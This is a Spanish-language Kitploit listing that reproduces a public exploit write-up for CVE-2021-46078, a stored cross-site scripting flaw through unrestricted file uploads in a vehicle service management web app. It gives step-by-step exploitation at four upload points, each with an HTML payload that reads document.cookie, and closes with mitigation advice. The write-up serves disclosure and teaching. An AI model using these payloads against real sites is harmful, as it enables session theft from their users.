Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting — CVE-2021-46078 - Existe una vulnerabilidad de carga de archivos sin restricciones en Sourcecodester Vehicle Service Management System 1.0. Un atacante remoto puede cargar archivos maliciosos que conducen a una vulnerabilidad de Cross-Site Scripting almacenado. | Kitploit
Herramientas/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-46078 - Existe una vulnerabilidad de carga de archivos sin restricciones en Sourcecodester Vehicle Service Management System 1.0. Un atacante remoto puede cargar archivos maliciosos que conducen a una vulnerabilidad de Cross-Site Scripting almacenado.

Ver Repositorio
hace 3 mesesAún no revisado

CVE-2021-46078

Título del Exploit: Vehicle Service Management System - 'Múltiple' Carga de archivos conduce a Cross-Site Scripting Almacenado

Autor del Exploit: SANU P.L

CVE: CVE-2021-46078

CVSS: 4.8 MEDIO

Referencias:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46078
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46078

Descripción:

Existe una vulnerabilidad de carga de archivos sin restricciones en Sourcecodester Vehicle Service Management System 1.0. Un atacante remoto puede cargar archivos maliciosos lo que conduce a una vulnerabilidad de Cross-Site Scripting Almacenado.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Iniciar sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegar a la sección My Account http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Guardar el código html anterior como, por ejemplo: XSS.html
  2. En la sección My Account ingresar todos los detalles requeridos y seleccionar el archivo html en Avatar.
  3. Hacer clic en el botón de actualizar.
  4. Abrir la imagen del avatar en una nueva pestaña.
  5. Código javascript malicioso ejecutado.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Iniciar sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegar a la sección User List y hacer clic en el botón Create New.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Guardar el código html anterior como, por ejemplo: XSS.html
  2. En la página Create New User ingresar todos los detalles requeridos y seleccionar el archivo html en Avatar.
  3. Hacer clic en el botón Save.
  4. Abrir la imagen del avatar en una nueva pestaña.
  5. Código javascript malicioso ejecutado.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit:

  1. Iniciar sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegar a la sección Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Guardar el código html anterior como, por ejemplo: XSS.html
  2. En la sección Settings ingresar todos los detalles requeridos y seleccionar el archivo html en System Logo.
  3. Hacer clic en el botón update.
  4. Abrir la imagen en System Logo en una nueva pestaña.
  5. Código javascript malicioso ejecutado.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit:

  1. Iniciar sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegar a la sección Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Guardar el código html anterior como, por ejemplo: XSS.html
  2. En la sección Settings ingresar todos los detalles requeridos y seleccionar el archivo html en Website Cover.
  3. Hacer clic en el botón update.
  4. Abrir la imagen de Website Cover en una nueva pestaña.
  5. Código javascript malicioso ejecutado.

Impacto:

Un atacante puede cargar archivos maliciosos en múltiples puntos finales, lo que conduce a Cross-Site Scripting Almacenado.

Mitigación:

Se recomienda implementar lo siguiente:

  • Nunca aceptar un nombre de archivo y su extensión directamente sin tener un filtro de lista blanca.
  • Si no es necesario tener caracteres Unicode, se recomienda encarecidamente aceptar solo caracteres alfanuméricos y solo un punto como entrada para el nombre del archivo y la extensión.
  • Limitar el tamaño del archivo a un valor máximo para prevenir ataques de denegación de servicio.
  • El directorio de carga no debe tener permiso de 'ejecución'.
  • No confiar solo en la validación del lado del cliente.
Descargar herramienta